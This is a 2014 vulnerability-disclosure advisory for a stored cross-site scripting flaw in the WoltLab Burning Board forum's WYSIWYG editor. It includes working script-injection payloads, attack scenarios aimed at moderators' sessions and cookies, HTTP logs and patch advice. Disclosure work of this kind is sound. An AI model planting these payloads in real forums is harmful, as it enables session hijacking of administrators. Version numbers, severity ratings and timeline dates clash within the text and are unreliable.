Reply

Document Title: =============== Woltlab Burning Board 3.9.1 - Persistent Web Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1256 Video: http://www.vulnerability-lab.com/get_content.php?id=1257 Release Date: ============= 2014-04-10 Vulnerability Laboratory ID (VL-ID): ==================================== 1256 Common Vulnerability Scoring System: ==================================== 3.5 Product & Service Introduction: =============================== WoltLab Burning Board ist eine von der WoltLab GmbH entwickelte, auf der Scriptsprache PHP basierende und objektorientiert programmierte Forensoftware. Im Gegensatz zu den Vorversionen wurde es unter Nutzung von PHP 5 komplett objektorientiert programmiert und erzeugt Markup, das den aktuellen Webstandards XHTML 1.1 und CSS2 entspricht. Schwerpunkte der Entwicklung lagen bei der Benutzung von semantischem HTML und Barrierefreiheit. Das Templatesystem wurde in der Syntax nun an Smarty angelehnt und bietet deutlich weiter gehende Möglichkeiten als in Version 2. Architektonisch gliedert sich die Software ab Version 3 in ein Framework mit dem Namen WoltLab Community Framework (WCF), das als Grundlage für die Entwicklung von Endanwendungen dient, und die darauf aufbauende Endanwendung Burning Board 3. Die Quelltexte des Kerns des WCF steht unter der Open-Source-Lizenz LGPL. Version 3.1 des Burning Board, welche am 14. Oktober 2009 veröffentlicht wurde, basiert auf der WCF-Version 1.1 und brachte viele Detailverbesserungen und ein völlig überarbeitetes Benutzerprofil, welches nun durch Profil-Plugins wie etwa Gästebuch, Galerie oder Blog, erweitert werden kann. Das am 6. März 2008 veröffentlichte kostenlose Burning Board Lite 2 ist keine Weiterentwicklung von Burning Board Lite 1, sondern basiert auf dem WoltLab Community Framework und Burning Board 3. Burning Board Lite 2 ist sowohl für kleinere Forenprojekte gedacht, welche nicht den gesamten Funktionsumfang der Vollversion benötigen, als auch als produktiv einsetzbare Demo von Burning Board 3 anzusehen. Am 11. November 2010 veröffentlichte Woltlab das Burning Board Lite 2.1. Es basiert auf dem Woltlab Community Framework 1.1 und bietet Funktionen, die bisher nur in kostenpflichtigen Versionen vorhanden waren. Das sind das neue Benutzerprofil und der WYSIWYG-Editor aus Version 3.1, eine Überarbeitung des Skins, eine Mitglieder-Suchfunktion, erweiterte Einstellungen für die Dateigröße sowie PN-Versand. (Copy of the Homepage: http://de.wikipedia.org/wiki/WoltLab_Burning_Board ) Abstract Advisory Information: ============================== The Vulnerability Laboratory Research Team discovered a persistent input validation web vulnerability in the official Woltlab GmbH - Burning Board v3.9.1. PL1 web-application Vulnerability Disclosure Timeline: ================================== 2014-04-11: Researcher Notification & Coordination (Ateeq ur Rehman Khan) 2014-00-00: Vendor Notification (Woltlab GmbH Security Team) 2014-00-00: Vendor Response/Feedback (Woltlab GmbH Security Team) 2014-00-00: Vendor Fix/Patch (Woltlab GmbH Developer Team) 2014-00-00: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Woltlab GmbH Product: Woltlab Burning Board - Forum Web Application 3.9.1 PL 1 Exploitation Technique: ======================= Remote Severity Level: =============== Low Technical Details & Description: ================================ A persistent input validation web vulnerability has been discovered in the official Woltlab GmbH Burning Board v3.0.9 pl1 web-application. The issue allows remote attackers to bypass the encoding filter of the editor to execute malicious persistent script codes on the application-side. Remote attackers are able to include malicious script codes while creating a new forum thread. Since the application fails to perform proper input sanatization by a secure re-encoding, the injected payloads get executed after an administrator or moderator reviews the post and tries to `Edit` and or `Quote/MultiQuote` the same thread. The script code execution occurs after an click of the img resource button of the WYSIWYG editor module. The vulnerability affects the `mce_editor_0_codeview` module. The same vulnerability also gets triggered if the moderator/administrator clicks on the `Insert Image` button while in the editor mode. By clicking the img button the short link which is marked get reverse encoded which results in the execution of the injected script codes via POST. Exploitation of the vulnerability requires a low privileged user account and low user interaction by an administrator or moderator of the forum. Successful exploitation results in persistent application-side phishing, application-side redirects, application-side session hijacking attacks and persistent manipulation of affected module context. Request Method(s): [+] POST Vulnerable Module(s): [+] mce_editor_0_codeview Vulnerable Parameter(s): [+] form > postID Affected Module(s): [+] Quote & Multi Quote Post (Editor) [+] Edit Post (Editor) Affected Version(s): [+] Burning Board 3.0.9 pl 1 (Sunrise) [+] Community Framework Version - 1.0.11 pl 4 (Horizon) Vulnerable Package(s): [+] com.woltlab.wcf.form.message.wysiwyg (1.0.10 pl 3 - Date:Mar 22nd 2010 - Author: WoltLab GmbH) Proof of Concept (PoC): ======================= The persistent bug and filter issue can be exploited by remote attackers with low privileged forum application user account and low user interaction by an administrator or moderator user account. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. Scenario 1: Remote 1. A remote attacker includes a broken link with malicious script codes to hijack the moderator or administrator session. 2. An moderator or administrator is reviewing the broken post and click on quote or edit to review the original source to fix 3. In the same moment the administrator or moderator clicks the image source edit button through the regular editor (non sourcecode view) the script codes executes (application-side) Scenario 2: Local 1. A local attacker opens a post and is able to inject own script codes, quotes his own post and clicks the image edit button to execute the code. 2. He is also able to save the link and request the cookies by usage of the affected form=PostEdit&postID parameters. PoC: \'"> # ">

\'"> # ">

%20"> --- Validation Problem Editor Output after the Reverse Encode [img button] --- [img]x[/img]\'"> ">[img]x[/img]" wcf_src=" \'"> "[img] ">[img]x[/img]\'"> ">[img]x[/img]" alt=" sCrIpT> "[img] sCrIpT> img>" title=" sCrIpT> "[img] sCrIpT> img>" /> [quote='Ateeq Ur Rehman Khan',index.php?page=Thread&postID=31#post31][url='asdasdsad'] adsasd[/url][/img]"[/quote] HTTP Logs: GET /forum/index.php?form=PostAdd&postID=23&action=quote HTTP/1.1 Host: vulnerability-db.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://vulnerability-db.com/forum/index.php?page=Thread&threadID=15 Cookie: wcf_cookieHash=[HIDDEN]; wcf_boardLastActivityTime=1397172274; wcf_userID=[]; wcf_password=[HIDDEN] Connection: keep-alive Response: HTTP/1.1 200 OK Server: nginx Date: Fri, 11 Apr 2014 10:46:00 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PleskLin Content-Length: 69495 Reply - test 1 - TalkBox #337 - VULNERABILITY LABORATORY - SECURITY RESEARCH FORUM

Friday, April 11th 2014, 12:46pm UTC+2

Welcome Ateeq Ur Rehman Khan.

Message information

Subject

Message

[quote='Ateeq Ur Rehman Khan',index.php?page=Thread&postID=23#post23]\'">

">[img]x[/img][size=10][align=center] [/align][/size][/align][/size][size=10][align=center][align=center]\'"><sCrIpt><iframe%20src=x%20onload=confirm

(2)></iframe>>TEST<h1>TESTing</h1></sCrIpT>[/align]

"><img onerror=prompt(/POC/) src=x></img>
">[/align][/size][/align][/size][size=10][align=center]" wcf_src="\'">[/align][/size][size=10][align=center]

Reference(s):
http://localhost:8080/forum/index.php?form=PostAdd&postID=23&action=quote
http://localhost:8080/forum/index.php?form=ThreadAdd&boardID=23

Picture(s):
				../1.png
				../2.png
				../3.png
				../4.png
				../5.png
				../6.png
				../7.png
				../8.png
				../9.png
				../10.png

Resource(s):
				../Reply - direct execute test 1 - TalkBox #337 - VULNERABILITY LABORATORY - SECURITY RESEARCH FORUM.htm
				../Edit post - test 1 - TalkBox #337 - VULNERABILITY LABORATORY - SECURITY RESEARCH FORUM.htm

Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse of the `mce_editor_0_codeview` module context on reverse requests through quote-, multiquote- or edit- post.
An Upgrade of v3.9.1 pl1 to v4.x can solve the editor issues fully. Update also the com.woltlab.wcf.form.message.wysiwyg editor core components to prevent the issue.
The version 4.x is not affected by the vulnerability and has already upgraded components which prevent an execution of script codes in the editor.

Security Risk:
==============
The security risk of the persistent validation vulnerability and encoding filter issue in the editor is estimated medium.

Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Ateeq Khan (ateeq@evolution-sec.com) [www.vulnerability-lab.com]

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either 
expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers 
are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even 
if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation 
of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break 
any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       		- www.evolution-sec.com
Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 	       		- admin@evolution-sec.com
Section:    dev.vulnerability-db.com	 	- forum.vulnerability-db.com 		       		- magazine.vulnerability-db.com
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       		- youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   		- vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php  	- vulnerability-lab.com/list-of-bug-bounty-programs.php	- vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to 
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website 
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact 
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

</article></body></html>

Query Builder